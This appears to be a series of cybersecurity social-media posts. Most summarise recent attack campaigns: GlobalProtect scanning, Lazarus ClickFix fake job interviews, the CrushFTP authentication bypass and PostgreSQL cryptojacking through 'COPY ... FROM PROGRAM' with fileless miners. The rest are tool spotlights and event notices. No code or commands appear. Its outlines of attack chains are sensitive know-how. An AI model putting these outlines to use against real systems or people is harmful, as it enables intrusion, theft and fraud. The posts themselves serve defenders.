Why did nearly 24,000 IP addresses suddenly start probing Palo Alto GlobalProtect gateways? 🔍🌐

Between March 17 and March 26, 2025, cybersecurity analysts observed a significant increase in login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect portals. At its peak, almost 24,000 unique IPs were involved, with daily traffic holding steady at around 20,000 before tapering off. Only a small subset—154 IPs—has been flagged as actively malicious, but the scale of the scanning suggests a broader reconnaissance effort.

GreyNoise, which tracks this kind of behavior, notes that such scanning often precedes attempts to exploit known or newly disclosed vulnerabilities. In fact, similar spikes in the past have aligned with new zero-days being revealed within weeks afterward. This pattern may indicate attackers are preparing for more targeted campaigns by first identifying unpatched or outdated systems that are exposed on the internet.

The geographic distribution offers further clues. Most of the scanning originated from North America and parts of Europe, while the targets were primarily in the U.S., U.K., Ireland, Russia, and Singapore. The focus appears to be on internet-facing instances, especially those that haven't been properly hardened or maintained.

Administrators running GlobalProtect should verify that their systems are up to date and consider implementing stricter access controls, such as multi-factor authentication and IP allowlists. Given the timing and scope, ignoring this kind of reconnaissance activity increases the risk of being caught in future exploitation campaigns.

#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity

— ✨
🔐 P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 💻🏴‍☠️

New Open-Source Tool Spotlight 🚨🚨🚨

Mapping your threat-hunting workflows to the MITRE ATT&CK framework? Check out olafhartong's ThreatHunting Splunk app. With 130+ reports and dashboards, it simplifies hunting while integrating Sysmon data for deep insights. Requires tuning for best results. #ThreatHunting #MITREATTACK

🔗 Project link on #GitHub 👉 https://github.com/olafhartong/ThreatHunting

#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity

— ✨
🔐 P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 💻🏴‍☠️

How do you trick someone into installing malware without triggering alarms? 🕵️💻

North Korea’s Lazarus group is doing it using a method called ClickFix, blending social engineering with targeted job scams to infect victims — and steal cryptocurrency. According to security firm Sekoia, this latest campaign, dubbed *ClickFake Interview*, impersonates legitimate crypto firms like Coinbase, Kraken, or Robinhood. Victims are contacted via social media and invited to fake job interviews hosted on cloned websites.

The process looks legitimate: candidates fill out forms, answer questions, and are asked to record an introduction video. But when they try to enable their webcam, a fake error kicks off the attack. The page tells them to fix the issue by downloading a driver or copying and running command-line code — that's the ClickFix technique. It exploits the victim’s unfamiliarity with system-level actions, especially among non-technical professionals in centralized finance (CeFi).

Based on the victim's operating system (identified via their browser’s User-Agent), the attackers deploy different payloads. On macOS, a bash script downloads "FrostyFerret," a password stealer, followed by "GolangGhost," a backdoor. On Windows, a VBScript fetches GolangGhost via NodeJS. This implant gives Lazarus remote control over the target’s machine, allowing data exfiltration, including sensitive browser information.

While earlier Lazarus campaigns had targeted developers, this one specifically aims at individuals with weaker technical defenses. Meanwhile, other threat actors are also adopting ClickFix — for example, distributing Qakbot through LinkedIn-based scams.

Sekoia has released detection rules and indicators of compromise (IOCs) to help defenders identify and counter the campaign. The broader concern is this: ClickFix sidesteps traditional safeguards not with technical brute force, but by using trust as the primary weapon.

#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity

— ✨
🔐 P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 💻🏴‍☠️

New Open-Source Tool Spotlight 🚨🚨🚨

Scopify is a Python-based recon tool for pentesters, leveraging `netify.ai` to analyze CDNs, hosting, and SaaS infra of target companies. Optional OpenAI integration adds AI-guided insights for deeper testing. Built by @Jhaddix & Arcanum-Sec. #CyberSecurity #BugBounty

🔗 Project link on #GitHub 👉 https://github.com/Arcanum-Sec/Scopify

#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity

— ✨
🔐 P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 💻🏴‍☠️

🚨 HackTheBay 2.0 is just around the corner — don’t miss this incredible cybersecurity event!

🎟️ Grab your tickets here: https://lu.ma/hackthebay2.0

🙋‍♂️ Want to get involved and make a meaningful impact on the security community? We're still looking for volunteers! Sign up here: https://docs.google.com/forms/d/e/1FAIpQLSezul4xKKtttvJ6yN7LSsYrr8FZFuu6i7BMxW4TKnlstJQMgw/viewform?fbzx=-3174919365540345050

Come hang out with like-minded individuals, network with security professionals, and level up your cybersecurity skills at HackTheBay!

📅 Date: Monday, April 28
🕙 Time: 10:00 AM – 5:00 PM
📍 Location: Public Works, San Francisco, California

How many unauthenticated file transfer servers are still exposed online in 2025? 🌐🔓

A critical flaw in CrushFTP, tracked as CVE-2025-2825, is being actively exploited in the wild. The vulnerability affects versions 10.0.0 through 10.8.3 and version 11.0.0, and it allows remote attackers to bypass authentication entirely using specially crafted HTTP or HTTPS requests. Public proof-of-concept code is already circulating, lowering the barrier for exploitation.

Shadowserver, a nonprofit security watchdog, reported that over 1,500 vulnerable instances remain online as of March 30, 2025. Just two days earlier, around 1,800 instances were detected, with more than half located in the U.S. These numbers suggest that many organizations haven't taken mitigation steps despite clear warnings.

The CrushFTP team has urged users to either patch immediately or, if an update isn't feasible, isolate installations using a DMZ configuration. This can reduce the attack surface but is not a long-term fix.

This type of vulnerability is particularly concerning because unauthenticated access to managed file transfer software often leads to sensitive data exposure or ransomware deployment. Groups like Cl0p have historically targeted platforms like MOVEit, Accellion FTA, and GoAnywhere MFT using similar flaws. In January, Cl0p claimed responsibility for exploiting Cleo file transfer software to breach dozens of companies.

CrushFTP's CVE-2025-2825 carries a CVSS score of 9.8. That reflects the ease of exploitation and the potential impact of compromise. For systems handling regulated or confidential data, the urgency is not optional—patching is essential.

#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity

— ✨
🔐 P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 💻🏴‍☠️

New Open-Source Tool Spotlight 🚨🚨🚨

Mandiant's `capa` analyzes executable files to pinpoint their capabilities. From detecting HTTP communications to identifying persistence mechanisms, it helps analysts assess malware functionality quickly. Supports PE, ELF, .NET, shellcode, and sandbox reports. #malwareanalysis #cybersecurity

🔗 Project link on #GitHub 👉 https://github.com/fireeye/capa

#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity

— ✨
🔐 P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 💻🏴‍☠️

If you're attending RSA Conference 2025 in San Francisco and want to level up your Kubernetes security skills, I’ll be giving a workshop this year at Cloud Village (@cloudvillage_dc ).

Join me as we explore both offensive and defensive strategies to break and secure Kubernetes clusters.

🗓 April 30
🕐 1:10 PM
📍 Sandbox at YBCA, Gallery 2

#RSAC #CloudSecurity #Kubernetes #Containers #CloudVillage #RedTeam #BlueTeam

https://rsa2025.cloud-village.org/

How can a simple SQL command open the door to full system takeover and cryptocurrency mining? 🐚🪙

A recent cloud attack campaign is exploiting misconfigured PostgreSQL servers, using legitimate database functionality to run malicious code on compromised systems. The operation, tracked by Wiz under the name JINX-0126, has targeted more than 1,500 exposed PostgreSQL instances so far. It builds on an earlier wave of attacks identified in mid-2024, but now includes more advanced evasion techniques.

At the core is the misuse of PostgreSQL's `COPY ... FROM PROGRAM` command. This command, intended for importing data, is leveraged to execute arbitrary shell commands directly on the host. Once inside, the attacker runs a Base64-decoded shell script that removes rival miners and installs a binary called PG_CORE.

A critical piece of this attack is an obfuscated Golang binary named *postmaster*. It mimics PostgreSQL’s real process, helping it blend in. It also sets up persistence through cron jobs, creates new privileged roles, and writes a binary named *cpu_hu* to disk.

That binary fetches and launches the XMRig cryptocurrency miner—without leaving files behind. This uses Linux's `memfd_create`, a technique that loads executables directly into memory to bypass detection tools that scan disk activity.

Each infected system is assigned a unique worker identity and connected to one of three Monero wallets controlled by the attacker. With about 550 active miners tied to each wallet, the impact spans at least 1,500 machines.

The broader issue is clear: many PostgreSQL services remain poorly secured with weak or default credentials. Combined with powerful features like programmatic file imports, they become easy targets for attackers looking to monetize unauthorized access without raising alarms.

#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity

— ✨
🔐 P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 💻🏴‍☠️